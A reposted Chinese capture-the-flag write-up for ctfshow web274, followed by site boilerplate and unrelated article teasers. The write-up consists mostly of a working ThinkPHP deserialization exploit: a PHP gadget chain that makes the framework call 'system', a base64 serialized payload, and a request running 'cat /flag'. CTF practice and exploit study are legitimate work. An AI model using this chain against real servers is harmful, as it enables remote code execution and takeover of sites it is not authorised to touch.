ctfshow web274

web274

在这里插入图片描述
thinkphp框架序列化漏洞
EXP

<?php 
namespace think;
abstract class Model{protected $append=[];private $data=[];function __construct(){$this->append=["lin"=>["ctf","show"]];$this->data=["lin"=>new Request()];}
}
class Request {protected $hook=[];protected $filter="system";protected $config=['var_ajax'=>'_ajax'];function __construct(){$this->filter="system";$this->config=['var_ajax'=>'lin'];$this->hook=["visible"=>[$this,"isAjax"]];}
}
namespace think\process\pipes;
use think\model\concern\Conversion;
use think\model\Pivot;
class Windows{private $files=[];public function __construct(){$this->files=[new Pivot()];}
}
namespace think\model;
use think\Model;
class Pivot extends Model{}
use think\process\pipes\Windows;
echo base64_encode(serialize(new Windows()));
?>

?data=TzoyNzoidGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzIjoxOntzOjM0OiIAdGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzAGZpbGVzIjthOjE6e2k6MDtPOjE3OiJ0aGlua1xtb2RlbFxQaXZvdCI6Mjp7czo5OiIAKgBhcHBlbmQiO2E6MTp7czozOiJsaW4iO2E6Mjp7aTowO3M6MzoiY3RmIjtpOjE7czo0OiJzaG93Ijt9fXM6MTc6IgB0aGlua1xNb2RlbABkYXRhIjthOjE6e3M6MzoibGluIjtPOjEzOiJ0aGlua1xSZXF1ZXN0IjozOntzOjc6IgAqAGhvb2siO2E6MTp7czo3OiJ2aXNpYmxlIjthOjI6e2k6MDtyOjk7aToxO3M6NjoiaXNBamF4Ijt9fXM6OToiACoAZmlsdGVyIjtzOjY6InN5c3RlbSI7czo5OiIAKgBjb25maWciO2E6MTp7czo4OiJ2YXJfYWpheCI7czozOiJsaW4iO319fX19fQ==&lin=cat /flag

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/diannao/10929.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Linux is命令参数和选项

Linux is命令参数和选项

在Linux系统中&#xff0c;命令行是一个非常重要且强大的工具&#xff0c;能够通过命令来完成各种任务。在使用Linux命令时&#xff0c;命令通常会有一些参数和选项&#xff0c;它们可以对命令的行为进行指定和调整&#xff0c;让我们更灵活地使用命令。 首先&#xff0c;让我…
阅读更多...
前端笔记-day02

前端笔记-day02

文章目录 01-无序列表02-有序列表03-定义列表04-表格06-表格-合并单元格07-表单-input08-表单-input占位文本09-表单-单选框10-表单-上传多个文件11-表单-多选框12-表单-下拉菜单13-表单-文本域14-表单-label标签15-表单-按钮16-无语义-span和div17-字体实体19-注册登录页面 01…
阅读更多...
JavaScript Dom 事件绑定与处理

JavaScript Dom 事件绑定与处理

JavaScript中的DOM事件是在HTML元素上发生的特定动作或事件。事件可以是鼠标点击、键盘按下、窗口调整大小等。JavaScript提供了一系列的方法来处理或绑定这些事件。 事件绑定 在JavaScript中&#xff0c;可以通过以下几种方法来绑定事件&#xff1a; 使用HTML属性&#xff1…
阅读更多...
Gitee仓库创建与使用

Gitee仓库创建与使用

Gitee仓库创建与使用 git config --global user.name 用户名 git config --global user.email 邮箱# 添加.gitignore git config --global core.excludesfile ~/.gitignore# 初始化仓库 cd myproject git init# 添加远程仓库&#xff0c;首次 git remote add origin https:…
阅读更多...
LeetCode 题目 121:买卖股票的最佳时机

LeetCode 题目 121:买卖股票的最佳时机

作者介绍&#xff1a;10年大厂数据\经营分析经验&#xff0c;现任字节跳动数据部门负责人。 会一些的技术&#xff1a;数据分析、算法、SQL、大数据相关、python&#xff0c;欢迎探讨交流 欢迎加入社区&#xff1a;码上找工作 作者专栏每日更新&#xff1a; LeetCode解锁1000题…
阅读更多...
MySQL优化-03索引

MySQL优化-03索引

索引 一.索引的作用 一个索引就是一颗B树&#xff0c;索引让我们可以快速定位和扫描到我们想要的数据&#xff0c;增加查询速度。在一个select查询语句中最多用到一个二级索引&#xff0c;即使在where条件中使用了多个二级索引。 二.InnoDB存储引擎支持的索引 B树索引、哈希索…
阅读更多...
Rust :给数据类型起一个别名

Rust :给数据类型起一个别名

在 Rust 中&#xff0c;你可以为类型定义别名&#xff0c;以便简化代码和提高可读性。类型别名使用 type 关键字来定义。这在你想要给复杂的类型&#xff0c;如闭包类型、结果类型&#xff08;Result&#xff09;或迭代器类型等&#xff0c;定义一个更具描述性的名称时特别有用…
阅读更多...
“知识世界”项目的自动化测试

“知识世界”项目的自动化测试

目录 1.项目介绍 1.1 项目功能介绍 2. 项目测试 2.1 需求分析 2.2 测试计划 2.3 设计测试用例 &#xff08;1&#xff09; 设计 登录 的测试用例 &#xff08;2&#xff09;设计 文章列表页 的测试用例 &#xff08;3&#xff09;设计 详情页 的测试用例 &#xff08…
阅读更多...
恒定导通时间控制COT

恒定导通时间控制COT

核心是让反馈脚上的文波电压与电感电流文波同相位
阅读更多...
车载测试系列:车载常见面试题

车载测试系列:车载常见面试题

自我介绍项目介绍项目具体是怎么测试的&#xff1f;CANoe是怎么使用的&#xff1f;台架是怎么搭建的&#xff1f;台架怎么测试的&#xff1f;诊断服务是怎么测试的&#xff1f;功能寻址和物理寻找的区别10服务有什么会话&#xff1f;11服务怎么确定软件复位和硬件复位是什么&am…
阅读更多...
Redis缓存的基本概念和使用

Redis缓存的基本概念和使用

Redis缓存的基本概念和使用 什么是缓存Redis缓存缓存更新策略缓存穿透缓存雪崩缓存击穿缓存工具类封装 什么是缓存 缓存时数据交换的缓冲区&#xff0c;存储数据的临时区&#xff0c;读写性能较好。 例如计算机的三级缓存。CPU的计算速度超过内存的读写速度&#xff0c;为了平…
阅读更多...
Gauge32类型的数据转换成int类型的数据

Gauge32类型的数据转换成int类型的数据

提前编译号snmp的库 #include <iostream> #include <libsnmp.h>#include "snmp_pp/snmp_pp.h"#ifdef WIN32 #define strcasecmp _stricmp #endif#ifdef SNMP_PP_NAMESPACE using namespace Snmp_pp; #endifusing namespace std; using namespace Snmp_pp…
阅读更多...
JAVA抽象类,接口与内部类,常用API知识总结

JAVA抽象类,接口与内部类,常用API知识总结

文章目录 抽象类和抽象方法抽象类的定义格式抽象方法的定义格式注意事项 接口定义和使用成员特点和类之间的关系新增JDK8新增方法JDK9新增方法 总结设计模式 内部类使用场景分类成员内部类获取内部类对象访问成员变量 静态内部类局部内部类匿名内部类格式使用场景 示例 常用API…
阅读更多...
java选择题

java选择题

题目来牛客网 1.类中的数据域使用private修饰为私有变量&#xff0c;所以任何方法均不能访问它。 A.正确 B.错误 答案&#xff1a;B&#xff0c;本类可以使用&#xff0c;反射也可以。 2.在类Tester中定义方法如下 public double max(int x, int y){//省略 } 则在该类中定义…
阅读更多...
数据集个人记录

数据集个人记录

Dataset 垂域数据集 240万条中文医疗数据集(包括预训练、指令微调和奖励数据集)&#xff1a;shibing624/medical 22万条中文医疗对话数据集(华佗项目)&#xff1a;shibing624/huatuo_medical_qa_sharegpt 通用数据集 Pretraining datasets 16GB中英文无监督、平行语料Lin…
阅读更多...
JVM内存信息分析

JVM内存信息分析

jmap安装使用 java - version 查看已安装jdk的版本 sudo apt-get install openjdk-11-jdk-headless 安装jmap jmap -version 验证是否安装成功 jmap -dump:live,formatb,filexxxx.hprof pid 导出jvm内存信息&#xff0c;pid一般为java进程id内存信息分析 strings xxx.phrof |…
阅读更多...
459.重复的子字符串

459.重复的子字符串

给定一个非空的字符串&#xff0c;判断它是否可以由它的一个子串重复多次构成。给定的字符串只含有小写英文字母&#xff0c;并且长度不超过10000。 示例 1: 输入: "abab"输出: True解释: 可由子字符串 "ab" 重复两次构成。 示例 2: 输入: "aba&q…
阅读更多...
MySQL优化-04慢查询和执行计划

MySQL优化-04慢查询和执行计划

慢查询 慢查询配置 MySQL记录所有执行超过long_query_time参数设定实际阈值的SQL语句日志 常用命令 SHOW VARIABLES like slow_query_log;--是否开启慢日志 SHOW VARIABLES like long_query_time;--时间阈值设置 SHOW VARIABLES like %log_queries_not_user_indexes%;--没有使…
阅读更多...
chap5 I/O管理

chap5 I/O管理

目录 一、I/O设备基本概念和分类 304 1.concept 2.classification &#xff08;1&#xff09;根据信息交换单位&#xff08;可能考&#xff09; 1)字符设备 2)块设备 &#xff08;2&#xff09;传输速率&#xff08;以下了解即可&#xff09; &#xff08;3&#xff09;…
阅读更多...
R语言数据分析案例-股票可视化分析

R语言数据分析案例-股票可视化分析

一、数据整合的对象 # Loading necessary libraries library(readxl) library(dplyr)# Reading the data from Excel files data_1 <- read_excel("云南白药.xlsx") data_2 <- read_excel("冰山.xlsx")二、数据整合的代码 # Reading the data from…
阅读更多...
最新文章

Copyright @ 2022~2023